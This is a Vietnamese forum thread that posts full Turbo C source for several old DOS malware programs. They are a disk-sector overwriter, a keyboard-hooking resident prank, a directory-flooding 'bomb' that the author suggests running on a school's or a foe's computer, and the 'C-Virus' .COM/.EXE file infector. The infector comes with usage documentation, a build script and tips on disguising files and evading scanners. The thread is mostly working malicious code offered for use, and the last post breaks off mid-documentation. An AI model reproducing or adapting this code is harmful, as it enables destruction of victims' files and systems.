Trang 1 trên tổng số 4 123... Cuối cùngCuối cùng
Từ 1 tới 10 trên tổng số 37 kết quả

Đề tài: Mã nguồn virus viết bằng Turbo C

  1. #1
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    Mặc định Mã nguồn virus viết bằng Turbo C

    C Code:
    1. #include <dos.h>
    2. #include <string.h>
    3.  
    4. main()
    5. {
    6.     char *vir;
    7.     int i;
    8.  
    9.     strcpy(vir,"");
    10.     for (i=0; i<40; i++)
    11.       strcat(vir,"HOWS IT DOING ROYAL UGLY DUDES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
    12.     abswrite(2,50,0,vir);
    13.     abswrite(3,50,0,vir);
    14.     abswrite(4,50,0,vir);
    15.     abswrite(5,50,0,vir);
    16.     printf("Ouch dude... sorry..");
    17. };


    C Code:
    1. /*  Cookie Monster                                                          */
    2. /*  Copyright (C) 1987 by Walker A. Archer                                  */
    3. /*                        169 Albertson                                     */
    4. /*                        Rochester, MI  48063                              */
    5. /*                                                                          */
    6. /*  Release 1.0 - 10/20/87 - First production release                       */
    7. /*                                                                          */
    8. /*  Special thanks to Michael Quinlan from whom much of this                */
    9. /*  code was borrowed.                                                      */
    10. /*                                                                          */
    11. /*  I hereby donate this package to the public domain.  Use it at your      */
    12. /*  own risk.  I make no claims or guarantees for its fitness for use       */
    13. /*  on any system, nor will I accept responsibility for lost or damaged     */
    14. /*  data.  Should anyone make changes to this code, please update the       */
    15. /*  release information at the top of this source file with comments        */
    16. /*  regarding the changes or improvements made.  Please send all comments   */
    17. /*  to the above address or contact me via Softlaw BBS (313) 474-4217.      */
    18. /*                                                                          */
    19. /*  Cookie Monster is based on a mainframe prank program which has          */
    20. /*  become popular at a number of universities.  Cookie Monster installs    */
    21. /*  itself into memory and remains there until it decides to wake up.       */
    22. /*  When it wakes up, a window is displayed in the middle of whatever       */
    23. /*  the user happens to be in, and a prompt is shown that says              */
    24. /*  'Gimme a cookie'.  The user must then figure out that he must enter     */
    25. /*  a type of cookie from the keyboard.  He must also figure out what       */
    26. /*  kind of cookie the monster is hungry for, because if you get the        */
    27. /*  wrong kind of cookie the monster will become more and more persistent,  */
    28. /*  interrupting whatever the user is doing each time it prompts for a      */
    29. /*  cookie.                                                                 */
    30. /*                                                                          */
    31. /*  Usage is:                                                               */
    32. /*                                                                          */
    33. /*              COOKIE <nnnn>                                               */
    34. /*                                                                          */
    35. /*                  where nnnn is a number between 10 and 1000.             */
    36. /*                                                                          */
    37. /*  The optional parameter sets the frequency that the Cookie Monster is    */
    38. /*  likely to wake up.  Cookie Monster chooses whether or not to wake up    */
    39. /*  randomly each time a keystroke is entered.  The default ratio is        */
    40. /*  1000:1. Therefore, if you enter COOKIE without the optional parameter   */
    41. /*  there is a 1000 to 1 chance that Cookie Monster will wake up on any     */
    42. /*  individual keystroke.  If you enter COOKIE 100 there is a 100:1 chance  */
    43. /*  that the Cookie Monster will wake up.  The ratio is decreased each      */
    44. /*  time a wrong response is detected, so there is a greater chance that    */
    45. /*  the Cookie Monster will wake up.  If a correct response is detected     */
    46. /*  the ratio is set back to the original and a new cookie is randomly      */
    47. /*  selected.                                                               */
    48. /*                                                                          */
    49. /*  Have fun with Cookie Monster, I know I had fun writing him.             */
    50. /*                                                                          */
    51. /*  Only one known bug exists at the time of release.  For some reason      */
    52. /*  the color is occasionally lost on one or two characters on the echoed   */
    53. /*  text.  This text is sent to the screen via bios calls.  I assume that   */
    54. /*  an interrupt is catching my program somewhere and changing the          */
    55. /*  attribute values.  I'll continue to debug this problem because it       */
    56. /*  makes the screen look sloppy, however it shouldn't cause any serious    */
    57. /*  problems.                                                               */
    58. /*                                                                          */
    59. /*  When compiling this source you should use the tiny model, but leave     */
    60. /*  cookie in its exe form.  It cannot be converted to a com file.  You     */
    61. /*  should expect 6 warning messages.  These are mostly because I ignored   */
    62. /*  the most significant bytes returned by biostime(), which I use as my    */
    63. /*  random number generator.                                                */
    64.  
    65. #include <dos.h>
    66. #include <process.h>
    67. #include <ctype.h>
    68. #include <mem.h>
    69.  
    70. long biostime(int,long);
    71.  
    72. #define KeybdVect       0x09
    73. #define KB_Data         0x60
    74.  
    75. #define NULL 0x00
    76.  
    77. void interrupt (*old_keyboard)(void);
    78.  
    79. unsigned int COOKIE_Active  = 0;    /* Non-zero when we are "popped up" */
    80. int Cookie_num = 0;
    81.  
    82. #define MAX_FREQ 1000
    83. int Frequency = MAX_FREQ;
    84. int SavFreq = MAX_FREQ;
    85.  
    86. #define SCR_ROW             25
    87. #define SCR_COL             80
    88. #define WINDOW_ROW          7
    89. #define WINDOW_COL          60
    90. #define WINDOW_UL_ROW       2
    91. #define WINDOW_UL_COL       10
    92.  
    93. #define W_TO_S_ROW(x)       ((x)+WINDOW_UL_ROW)
    94. #define W_TO_S_COL(x)       ((x)+WINDOW_UL_COL)
    95. #define RC_TO_OFF(row,col)  (((row)*SCR_COL + (col)) * 2)
    96.  
    97. #define NORM_ATTR               0x1E
    98.  
    99. char OldScreen[SCR_COL*SCR_ROW*2];
    100. char far *VideoBuffer;
    101.  
    102. #define NUM_OF_COOKIES 13
    103.  
    104. char Cookie_type[NUM_OF_COOKIES][15] = {
    105.     "chocolate chip",
    106.     "oreo",
    107.     "macaroon",                 /*  The baker's dozen  */
    108.     "oatmeal",
    109.     "peanut butter",
    110.     "fig newton",
    111.     "lady fingers",
    112.     "sugar",
    113.     "vanilla wafers",
    114.     "pecan sandies",
    115.     "chips ahoy",
    116.     "ginger snaps",
    117.     "girl scout"
    118. };
    119.  
    120. #define INCORRECT_NUM 5
    121.  
    122. char Bad_Resp[INCORRECT_NUM][17] = {
    123.     "Blech!!!",
    124.     "Me no like that.",
    125.     "Yuck!!!",
    126.     "Ugh...",
    127.     "Arghhh!!"
    128. };
    129.  
    130. #define CORRECT_NUM 5
    131.  
    132. char Good_Resp[CORRECT_NUM][17] = {
    133.     "Mmmm... me like!",
    134.     "YummmYummm",
    135.     "Oh boy... Tanks",
    136.     "Delicious...",
    137.     "Thank You"
    138. };
    139.    
    140.  
    141. char NewScreen[WINDOW_COL*WINDOW_ROW+1] =
    142.     "ɍ͍͍͍͍͍͍͍͠Info-Tech Cookie Monster ͍͍͍͍͍͍͍͍?"
    143.     "?                                                          ?"
    144.     "?         Gimme a cookie!                                  ?"
    145.     "?                                                          ?"
    146.     "?                                                          ?"
    147.     "?                                                          ?"
    148.     "ȍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͼ";
    149.  
    150. #define ESC_KEY             0x1B
    151. #define CR_KEY              0x0D
    152. #define BS_KEY              0x08
    153.  
    154. /*------------------------------------------------------------------------*/
    155. /*                                                                        */
    156. /*   exit - Reduce code size by replacing the standard exit function.     */
    157. /*          We don't use files, so there is no need to bring in the file  */
    158. /*          system just to close files.                                   */
    159. /*                                                                        */
    160. /*------------------------------------------------------------------------*/
    161. void cdecl exit(int status)
    162. {
    163.     _exit(status);
    164. }
    165.  
    166. /*------------------------------------------------------------------------*/
    167. /*                                                                        */
    168. /*   _setenvp - Suppress this library function to conserve code space.    */
    169. /*                                                                        */
    170. /*------------------------------------------------------------------------*/
    171. void cdecl _setenvp(void)   {}
    172.  
    173. /*------------------------------------------------------------------------*/
    174. /*                                                                        */
    175. /*   main - Main Program.  Initialize interrupt vectors, etc.             */
    176. /*                                                                        */
    177. /*------------------------------------------------------------------------*/
    178. cdecl main(int argc, char *argv[])
    179. {
    180.     void interrupt KeybdHandler(void);
    181.     unsigned int prgsize(void);
    182.     int atoi(char *);
    183.     unsigned int biosequip(void);
    184.     static int i;
    185.     static unsigned int j;
    186.  
    187.     bdosptr(0x09,"COOKIE MONSTER\r\n$",0);
    188.     bdosptr(0x09,"Copyright (c) 1987 by Walker Archer\r\n$",0);
    189.     bdosptr(0x09,"Initiating lurk mode.\r\n$",0);
    190.     j = biosequip();
    191.     if ((j & 48) == 48)                             /* Check for mono or    */
    192.         VideoBuffer = (char far *) 0xB0000000L;     /*   color monitor      */
    193.     else
    194.         VideoBuffer = (char far *) 0xB8000000L;
    195.  
    196.     if (argv[1] != NULL) {
    197.         if ((i = atoi(argv[1])) > 9 && (i <1001))
    198.             SavFreq = Frequency = i;
    199.         else {
    200.             bdosptr(0x09,"\r\nERROR - argument must be between 10 and 1000\r\n$",0);
    201.             bdosptr(0x09,"\r\nContinuing installation with a default of 1000\r\n$",0);
    202.         }
    203.     }
    204.     old_keyboard = getvect(KeybdVect);
    205.     setvect(KeybdVect, KeybdHandler);
    206.     Cookie_num = biostime(0,0)%NUM_OF_COOKIES;
    207.     keep(0, prgsize());
    208. }
    209.  
    210. /*------------------------------------------------------------------------*/
    211. /*                                                                        */
    212. /*   prgsize - Calculate program size.                                    */
    213. /*                                                                        */
    214. /*     __brklvl has the end of initialized and uninitialized data within  */
    215. /*     the data segment at program startup. It is then incremented and    */
    216. /*     decremented as memory is malloc'd and free'd.                      */
    217. /*                                                                        */
    218. /*     This function works in Tiny, Small, and Medium models.             */
    219. /*                                                                        */
    220. /*------------------------------------------------------------------------*/
    221. unsigned int prgsize(void)
    222. {
    223.     extern unsigned __brklvl;
    224.     extern unsigned _psp;
    225.  
    226.     return (_DS + (__brklvl + 15) / 16 - _psp);
    227. }
    228.  
    229. /*------------------------------------------------------------------------*/
    230. /*                                                                        */
    231. /*   KeybdHandler - Handle keyboard interrupts. Check for our popup code. */
    232. /*                  If so, and if we are not already active, then invoke  */
    233. /*                  the popup program. Otherwise pass the stuff on to the */
    234. /*                  original handler.                                     */
    235. /*                                                                        */
    236. /*     Static and Global variables are used to keep the stack size to a   */
    237. /*     minimum.                                                           */
    238. /*                                                                        */
    239. /*------------------------------------------------------------------------*/
    240. void interrupt KeybdHandler()
    241. {
    242.     void COOKIE(void);
    243.     unsigned int GetKey(void);
    244.     long biostime(int,long);
    245.     static char c;
    246.  
    247.     c = inportb(KB_Data);
    248.     (*old_keyboard)();
    249.     if (((biostime(0,0)%Frequency) == 0) && (COOKIE_Active != 1)) {
    250.         ++COOKIE_Active;
    251.         GetKey();
    252.         COOKIE();
    253.       --COOKIE_Active;
    254.     }
    255. }
    256.  
    257. void COOKIE(void)
    258. {
    259.     void Set_curs_pos(unsigned int,unsigned int,unsigned int);
    260.     void Get_curs_pos(unsigned int *,unsigned int *,unsigned int);
    261.     void SaveWindow(void);
    262.     void RestoreWindow(void);
    263.     void DisplayWindow(void);
    264.     void Print_Str(char *,int,int);
    265.     void Print_Char(char,int,int);
    266.     void Get_Str(char *,int,int,int);
    267.     unsigned int GetKey(void);
    268.     int stricmp(char *,char *);
    269.     unsigned strlen(char *);
    270.     static unsigned int savrow,savcol;
    271.     static char Got_cookie[16];
    272.     static int l;
    273.  
    274.     SaveWindow();                       /* Save the screen                  */
    275.     DisplayWindow();                    /*   and pop up the window          */
    276.     Get_curs_pos(&savrow,&savcol,0);    /* Save current cursor position     */
    277.     Set_curs_pos(4,36,0);               /*   then move cursor to the window */
    278.     Get_Str(Got_cookie,18,15,0);        /* Accept input                     */
    279.  
    280.     if (stricmp(Got_cookie,Cookie_type[Cookie_num])) { /* Wrong response    */
    281.         l = biostime(0,0)%INCORRECT_NUM;
    282.         Set_curs_pos(6,(40 - (strlen(Bad_Resp[l]) / 2)),0);
    283.         Print_Str(Bad_Resp[l],15,0);
    284.  
    285.         if (Frequency > 10)             /* Adjust the frequency ratio       */
    286.             Frequency /= 2;
    287.  
    288.     }
    289.     else {                              /* Correct response                 */
    290.         l = biostime(0,0)%CORRECT_NUM;
    291.         Set_curs_pos(6,(40 - (strlen(Good_Resp[l]) / 2)),0);
    292.         Print_Str(Good_Resp[l],15,0);
    293.         Frequency = SavFreq;
    294.         Cookie_num = biostime(0,0)%NUM_OF_COOKIES;     
    295.     }
    296.     for (l=0;l<32000;l++);
    297.     for (l=0;l<32000;l++);
    298.     Set_curs_pos(savrow,savcol,0);      /*   then restore old curs pos      */
    299.     RestoreWindow();                    /* Restore, makes window disapear   */
    300. }
    301.  
    302. void SaveWindow(void)
    303. {
    304.     movedata(FP_SEG(VideoBuffer), 0, _DS, (int) OldScreen, SCR_COL*SCR_ROW*2);
    305. }
    306.  
    307. void RestoreWindow(void)
    308. {
    309.     movedata(_DS, (int) OldScreen, FP_SEG(VideoBuffer), 0, SCR_COL*SCR_ROW*2);
    310. }
    311.  
    312. void DisplayWindow(void)
    313. {
    314.     static int row, col;
    315.     static char *sp, far *dp;
    316.  
    317.     dp = VideoBuffer + (WINDOW_UL_ROW*SCR_COL + WINDOW_UL_COL)*2;
    318.     sp = NewScreen;
    319.     for (row=0; row<WINDOW_ROW; row++) {
    320.         for (col=0; col<WINDOW_COL; col++) {
    321.             *dp++ = *sp++;
    322.             *dp++ = NORM_ATTR;
    323.         }
    324.         dp += (SCR_COL-WINDOW_COL)*2;
    325.     }
    326. }
    327.  
    328. /*------------------------------------------------------------------------*/
    329. /*                                                                        */
    330. /*       GetKey   - Get a key from the keyboard via BIOS calls.           */
    331. /*                                                                        */
    332. /*------------------------------------------------------------------------*/
    333.  
    334. unsigned int GetKey(void)
    335. {
    336.     int bioskey(int);
    337.     static unsigned int c;
    338.  
    339.     c = bioskey(0);
    340.     if ((c & 0x00FF) != 0) return (c & 0x00FF);
    341.     else return c;
    342. }
    343.  
    344. /*------------------------------------------------------------------------*/
    345. /*                                                                        */
    346. /*   Set_curs_pos - Set the cursor position via BIOS calls.  The          */
    347. /*                  caller must send the page number (usually 0)          */
    348. /*                  in addition to the row and column to maintain         */
    349. /*                  flexibility for use in other programs.                */
    350. /*                                                                        */
    351. /*------------------------------------------------------------------------*/
    352.  
    353. void Set_curs_pos(unsigned int row,unsigned int col,unsigned int page)
    354. {
    355.     _AX = 0x0200;
    356.     _DL = col;
    357.     _DH = row;
    358.     _BH = page;
    359.     geninterrupt(0x10);
    360. }
    361.  
    362. /*------------------------------------------------------------------------*/
    363. /*                                                                        */
    364. /*   Get_curs_pos - Get the cursor position via BIOS calls.  The          */
    365. /*                  caller must send the page number (usually 0)          */
    366. /*                  in addition to the row and column to maintain         */
    367. /*                  flexibility for use in other programs.                */
    368. /*                                                                        */
    369. /*------------------------------------------------------------------------*/
    370.  
    371. void Get_curs_pos(unsigned int *row,unsigned int *col,unsigned int page)
    372. {
    373.     _AX = 0x0300;
    374.     _BH = page;
    375.     geninterrupt(0x10);
    376.     *col = _DL;
    377.     *row = _DH;
    378. }
    379.  
    380. /*------------------------------------------------------------------------*/
    381. /*                                                                        */
    382. /*     Print_Char - Print a character to the screen via BIOS calls.       */
    383. /*                  caller must send the page number (usually 0)          */
    384. /*                  in addition to the character and attribute in         */
    385. /*                  order to maintain flexibility.                        */
    386. /*                                                                        */
    387. /*------------------------------------------------------------------------*/
    388.  
    389. void Print_Char(char c, int attr, int page)
    390. {
    391.     _AH = 14;
    392.     _AL = c;
    393.     _BL = attr;
    394.     _BH = page;
    395.     geninterrupt(0x10);
    396. }
    397.  
    398. void Print_Str(char *s, int attr, int page)
    399. {
    400.     static char c;
    401.  
    402.     while ((c = *s++) != 0) Print_Char(c, attr, page);
    403. }
    404.  
    405. /*------------------------------------------------------------------------*/
    406. /*                                                                        */
    407. /*     Get_Str - Print a string to the screen via BIOS calls.  The        */
    408. /*               caller must send the page number (usually 0)             */
    409. /*               in addition to the string and attribute in               */
    410. /*               order to maintain flexibility.                           */
    411. /*                                                                        */
    412. /*------------------------------------------------------------------------*/
    413.  
    414. void Get_Str(char *s, int len, int attr, int page)
    415. {
    416.     static char c;
    417.     static int i = 0;
    418.  
    419.     while ((c = bioskey(0)) != CR_KEY) {
    420.         switch (c) {
    421.             case BS_KEY:
    422.                 if (i > 0) {
    423.                     *s--;
    424.                     i--;
    425.                     Print_Char(c, attr, page);
    426.                     Print_Char(' ', attr, page);
    427.                     Print_Char(c, attr, page);
    428.                 }
    429.                 break;
    430.             case ESC_KEY:
    431.                 break;
    432.             default:
    433.                 if (i < len) {
    434.                     *s++ = c;
    435.                     i++;
    436.                     Print_Char(c, attr, page);
    437.                 }
    438.                 break;
    439.         }
    440.     }
    441.     *s = '\0';
    442.     i = 0;
    443. }

  2. #2
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    C Code:
    1. /****
    2.  This program was designed by Ninja Wala from SUP
    3.  
    4.  
    5.    Now, you must remember this : DON'T RUN THIS PROGRAM ON YOUR HD, or you'll
    6.    be long time dead, this is not a virus, this is a bomb !
    7.  
    8.    Program code is pretty straight forward, you can compile it with any version
    9.    of Turbo C or Microsoft C ( change the dir.h into direct.h ), or you can
    10.    copy this program into your own source as a routine. piece of cake.
    11.  
    12.    There isn't any big skill in this program, it's just an idea of joke,
    13.    punishment or whatever, what this program do is it build 50 subdirectories
    14.    and in each subdirectory build another 50 sundirectories, and there is NO
    15.    utility can remove it, pctools will just crash or malfunction, and if you
    16.    remove it by hand... hmm... let's say you'll spend a month in front of your
    17.    computer typing RD ..... , RD..... RD ..... , and spitting dirty words at
    18.    the same time, hehe.
    19.  
    20.    If you know nothing about C language, you can just take the EXE file and
    21.    use it, just type CRAZY, and you'll be long time dead, so what you should
    22.    do is do it at RAM disk or blank floppy disk, or your school's computer or
    23.    your foe's computer, it will be really a mess....
    24.  
    25.    Change the value of 50 will give the owner of that computer a stroke.
    26.  
    27.  
    28. P.S : If you already run CRAZY.EXE before you read this.... ack leave me
    29.         E-mail, and we'll see what I can do.
    30.  
    31. -Ninja Wala
    32. *****/
    33.  
    34. /****
    35.    Make You Crazy !!
    36.  
    37.     Never execute this program on your HD , haha !!
    38.  
    39.     Programmed By Ninja Wala -- Royal Leader of Software Underground Palace
    40.  
    41.     Share your knowledge and experience with other members in SUP,
    42.     and we share ours with you.
    43. */
    44.  
    45. #include        <stdio.h>
    46. #include        <stdlib.h>
    47. #include        <dir.h>
    48.  
    49. main()
    50. {
    51.     int i,j;
    52.     char tmp[20];
    53.     char far *ptr;
    54.  
    55.     for (i=0;i<=50;i++){
    56.         srand(rand());
    57.         ptr = itoa(rand(),tmp,10);
    58.         mkdir ( ptr );
    59.         chdir ( ptr );
    60.         for (j=0;j<=50;j++){
    61.             ptr = itoa(rand(),tmp,10);
    62.             mkdir( ptr );
    63.         }
    64.         chdir ("\\");
    65.     }
    66. }

    Documentation Code:
    1.                           Documentation for C-Virus
    2.  
    3.  
    4. I. How to use
    5.  
    6.      To use C-Virus, merely rename it to some innocent (or not-so-innocent)
    7. sounding file name, such as ULTIMA7.EXE or GIFVIEW.COM.  Then let someone run
    8. it.  It's that simple.  Just make sure that its extension is .EXE or .COM.
    9.      One option of C-Virus is that you can choose to replace any .EXE or .COM
    10. file (or, if you really wanted to, any file) with C-Virus.  At the DOS prompt
    11. type "C-Virus (filename)" where filename is the name of the victim.  C-Virus
    12. will only spread to that file, not harming any other file in the directory.
    13. For example, you could type "CVIRUS WC2.EXE" and although WC2.EXE would appear
    14. unchanged, it is now actually another copy of C-Virus.  Then feel free to
    15. show "Wing Commander II" to all your friends (on their computers, of course).
    16.  
    17.  
    18. II.  Modifying C-Virus
    19.  
    20.      C-Virus was written in Borland's Turbo C++ v1.00 with some inline 8086
    21. assembly language.  C-Virus will also compile under Turbo C v2.00, and should
    22. port to other IBM-PC C compilers with little modification.  If you'd like to
    23. observe C-Virus in action, uncomment the line reading "// #define DEBUG 1."
    24. Note that this will cause the resultant .EXE file to grow by at least 1k.
    25.      Another good area for modification is the function hostile_activity().
    26. This function is automatically called if there are no files left to infect.
    27. The current version of C-Virus merely has this function beep three times and
    28. print "All files infected.  Mission complete."  If you feel hostile or want
    29. to seek revenge on someone with C-Virus, replacing the friendly message with
    30. a few select calls to abswrite(), unlink(), and biosdisk() could liven things
    31. up a bit.
    32.      Other good expansions of C-Virus include adding support for multiple-
    33. directory spreads; changing the code so that C-Virus only goes off on certain
    34. days, weeks, etc.; adding memory-resident support; or, for the truly ambitious,
    35. adding specific COMMAND.COM "support" <hehehe>.  Simple modifications to C-
    36. Virus can easily create viruses just as good as the "professionals'."
    37.      Note:  Try to avoid using printf() or related functions; they can increase
    38. the size of C-Virus dramatically.  Instead use the function small_print().
    39. In addition, note that TOO_SMALL is left defined at a little over 6k.  If,
    40. when recompiling C-Virus, you see that the final product is larger or smaller,
    41. change TOO_SMALL to a little over the size of the .EXE file.  This insures
    42. maximum effect without alerting people via increase in file size.
    43.  
    44.  
    45. III.  Recompiling C-Virus
    46.  
    47.      To re-compile C-Virus, use the included batch file MAKEVIR.BAT.  This
    48. file assumes that you:  (1) Have LZEXE.EXE, and that it's in your path; (2)
    49. DEBUG is also in your path; and (3) That MAKEVIR.SCR is in the current
    50. directory.  If any of these things are different on your computer, change the
    51. batch file accordingly.
    52.      A note about the "NMAN" signature:  When creating new versions of C-Virus,
    53. I suggest changing the signature to something else.  IT MUST BE FOUR BYTES
    54. LONG.  Change MAKEVIR.SCR so the second line reads "DB '(four bytes)'."  Also
    55. change the definition of SIGNATURE in the C source code.  Nowhere Man would
    56. appreciate that any modified versions do not read "NMAN" - use some other
    57. bytes.  These bytes not only insure that there is a signature so that files
    58. aren't re-infected, but they also stop people from UNLZEXEing you virus for
    59. analysis.
    60.  
    61. IV.  Removing C-Virus
    62.  
    63.      DO NOT accidentally infect yourself.  Infected files are unrecoverable.
    64. If you infect your files, the only way to get rid of the virus is to erase
    65. them.  Don't say you weren't warned.
    66.      By the way, no virus-scanner that I know of can identify C-Virus.  Of
    67. course, it's only a matter of time, so be sure to change the signature or
    68. code in minor ways frequently.  Nothing can remove C-Virus either.  Oh well.
    69.  
    70.  
    71. V.  A Listing for C-Virus (a l? The Computer Virus Handbook by Richard Levin)
    72.  
    73.  
    74. C-Virus
    75.  
    76.  
    77. Aliases                  None
    78. Effective Length         N/A
    79. Type code(s)             ONA - overwriting nonresident .COM and .EXE infector
    80. Detection method         None
    81. Removal instructions     Delete infected files
    82.  
    83.  
    84. The C-Virus was written on June 25, 1991 by the mysterious hacker known as
    85. "Nowhere Man."  It is a generic .COM and .EXE infector.  When it activates,
    86. it displays the message "Out of memory."  It then exits back to DOS, making
    87. the user believe that he had insufficient memory to run the program.  Because
    88. C-Virus overwrites the file (although the file's size is unaffected), infected
    89. files must be deleted and replaced with uninfected copies in order to remove
    90. the virus.  When all files in a given directory are infected, a message is
    91. displayed to that effect, and nothing further happens.
    92.      Note:  There are many strains of the C-Virus, many of which aren't so
    93. harmless.  Don't be lulled into a false sense of security.
    94.  
    95.  
    96.  
    97.                                   Have Fun!
    98.  
    99.                                - Nowhere Man@echo off
    100. tcc -O -Z -ms cvirus.c > nul
    101. if errorlevel 1 pause ** Error - Press Control-Break now **
    102. erase cvirus.obj > nul
    103. lzexe cvirus > nul
    104. erase cvirus.old > nul
    105. ren cvirus.exe cvir.tmp > nul
    106. debug cvir.tmp < makevir.scr > nul
    107. ren cvir.tmp cvirus.exe > nul
    108. echo Your virus is done...
    109.  
    110.  
    111.  
    112.                   ɍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͻ
    113.                   ?          The Hell Pit BBS              ?
    114.                   ?              1200/2400                 ?
    115.                   ? Sysops:    Operating At    Permanent   ?
    116.                   ?  HADES       4,500,000? suntans    ?
    117.                   ?  K?TO                      available   ?
    118.                   ?       ?    (708)459-7267               ?
    119.                   ?      ???                   ?          ??
    120.                   ? ?   ?????      ?          ??         ???
    121.                   ??   ???????      ?        ????       ????
    122.                   ??? ?????????   ????     ???????     ?????
    123.                   ?? ??????????? ???????   ????????   ??????
    124.                   ??????????????????????? ?????????? ???????
    125.                   ??????????????????????????????????????????
    126.                   ȍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͼ
    127.                             We want your viruses!
    C Code:
    1. /* C-Virus:  A generic .COM and .EXE infector
    2.  
    3.    Written by Nowhere Man
    4.  
    5.    Project started and completed on 6-24-91
    6.  
    7.    Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
    8. */
    9.  
    10.  
    11. #pragma inline                      // Compile to .ASM
    12.  
    13. #include <alloc.h>
    14. #include <dir.h>
    15. #include <dos.h>
    16. #include <io.h>
    17. #include <stdio.h>
    18.  
    19. void hostile_activity(void);
    20. int infected(char *);
    21. void spread(char *, char *);
    22. void small_print(char *);
    23. char *victim(void);
    24.  
    25. // #define DEBUG
    26. #define ONE_KAY   1024                  // 1k
    27. #define TOO_SMALL ((6 * ONE_KAY) + 300)         // 6k+ size minimum
    28. #define SIGNATURE "NMAN"                // Sign of infection
    29.  
    30. int main(void)
    31. {
    32.     /* The main program */
    33.  
    34.     spread(_argv[0], victim());         // Perform infection
    35.     small_print("Out of memory\r\n");       // Print phony error
    36.     return(1);                  // Fake failure...
    37. }
    38.  
    39. void hostile_activity(void)
    40. {
    41.     /* Put whatever you feel like doing here...I chose to
    42.        make this part harmless, but if you're feeling
    43.        nasty, go ahead and have some fun... */
    44.  
    45.     small_print("\a\a\aAll files infected.  Mission complete.\r\n");
    46.     exit(2);
    47. }
    48.  
    49. int infected(char *fname)
    50. {
    51.     /* This function determines if fname is infected */
    52.  
    53.     FILE *fp;                   // File handle
    54.     char sig[5];                    // Virus signature
    55.  
    56.     fp = fopen(fname, "rb");
    57.     fseek(fp, 28L, SEEK_SET);
    58.     fread(sig, sizeof(sig) - 1, 1, fp);
    59. #ifdef DEBUG
    60.     printf("Signature for %s:  %s\n", fname, sig);
    61. #endif
    62.     fclose(fp);
    63.     return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
    64. }
    65.  
    66. void small_print(char *string)
    67. {
    68.     /* This function is a small, quick print routine */
    69.  
    70.     asm {
    71.         push    si
    72.         mov si,string
    73.         mov ah,0xE
    74.     }
    75.  
    76. print:  asm {
    77.         lodsb
    78.         or  al,al
    79.         je  finish
    80.         int 0x10
    81.         jmp short print
    82.     }
    83. finish: asm     pop si
    84. }
    85.  
    86. void spread(char *old_name, char *new_name)
    87. {
    88.     /* This function infects new_name with old_name */
    89.  
    90.  
    91.     /* Variable declarations */
    92.  
    93.     FILE *old, *new;                // File handles
    94.     struct ftime file_time;                         // Old file date, time
    95.     int attrib;                 // Old attributes
    96.     long old_size, virus_size;          // Sizes of files
    97.     char *virus_code = NULL;            // Pointer to virus
    98.     int old_handle, new_handle;         // Handles for files
    99.  
    100.  
    101.     /* Perform the infection */
    102.  
    103. #ifdef DEBUG
    104.     printf("Infecting %s with %s...\n", new_name, old_name);
    105. #endif
    106.     old = fopen(old_name, "rb");            // Open virus
    107.     new = fopen(new_name, "rb");            // Open victim
    108.     old_handle = fileno(old);           // Get file handles
    109.     new_handle = fileno(new);
    110.     old_size = filelength(new_handle);      // Get old file size
    111.     virus_size = filelength(old_handle);        // Get virus size
    112.     attrib = _chmod(new_name, 0);           // Get old attributes
    113.     getftime(new_handle, &file_time);       // Get old file time
    114.     fclose(new);                    // Close the virusee
    115.     _chmod(new_name, 1, 0);             // Clear any read-only
    116.     unlink(new_name);               // Erase old file
    117.     new = fopen(new_name, "wb");            // Open new virus
    118.     new_handle = fileno(new);
    119.     virus_code = malloc(virus_size);        // Allocate space
    120.     fread(virus_code, virus_size, 1, old);      // Read virus from old
    121.     fwrite(virus_code, virus_size, 1, new);         // Copy virus to new
    122.     _chmod(new_name, 1, attrib);            // Replace attributes
    123.     chsize(new_handle, old_size);           // Replace old size
    124.     setftime(new_handle, &file_time);       // Replace old time
    125.  
    126.  
    127.     /* Clean up */
    128.  
    129.     fcloseall();                    // Close files
    130.     free(virus_code);               // Free memory
    131. }
    132.  
    133. char *victim(void)
    134. {
    135.     /* This function returns the virus's next victim */
    136.  
    137.  
    138.     /* Variable declarations */
    139.  
    140.     char *types[] = {"*.EXE", "*.COM"};     // Potential victims
    141.     static struct ffblk ffblk;          // DOS file block
    142.     int done;                   // Indicates finish
    143.     int index;                  // Used for loop
    144.  
    145.  
    146.     /* Find our victim */
    147.  
    148.     if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
    149.         return(_argv[1]);
    150.     for (index = 0; index < sizeof(types); index++) {
    151.         done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH);
    152.         while (!done) {
    153. #ifdef DEBUG
    154.             printf("Scanning %s...\n", ffblk.ff_name);
    155. #endif
    156.             /* If you want to check for specific days of the week,
    157.                months, etc., here is the place to insert the
    158.                code (don't forget to "#include <time.h>"!) */
    159.  
    160.             if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize > TOO_SMALL))
    161.                 return(ffblk.ff_name);
    162.             done = findnext(&ffblk);
    163.         }
    164.     }
    165.  
    166.  
    167.     /* If there are no files left to infect, have a little fun... */
    168.  
    169.     hostile_activity();
    170.     return(0);                  // Prevents warning
    171. }

  3. #3
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    Documentation Code:
    1.                           Documentation for C-Virus
    2.                          ---------------------------
    3.  
    4.  
    5. I. How to use
    6.  
    7.      To use C-Virus, merely rename it to some innocent (or not-so-innocent)
    8. sounding file name, such as ULTIMA7.EXE, GIFVIEW.COM, or HOTSEX.EXE.  Then
    9. let someone run it.  It's that simple.  Just make sure that its extension is
    10. .EXE or .COM.
    11.       A better choice is to replace any .EXE or .COM file (or, if you really
    12. wanted to, any file) with C-Virus.  At the DOS prompt type "CVIRUS (filename)"
    13. where filename is the name of the victim.  C-Virus will only spread to that
    14. file, not harming any other file in the directory. For example, you could
    15. type "CVIRUS WC2.EXE" and although WC2.EXE would appear unchanged, it is now
    16. actually another copy of C-Virus.  Then feel free to show "Wing Commander II"
    17. to all your friends (on their computers, of course).  Be sure to backup the
    18. file if you want to keep it, as CVIRUS will totally obliterate it.
    19.  
    20.  
    21. II.  Modifying C-Virus
    22.  
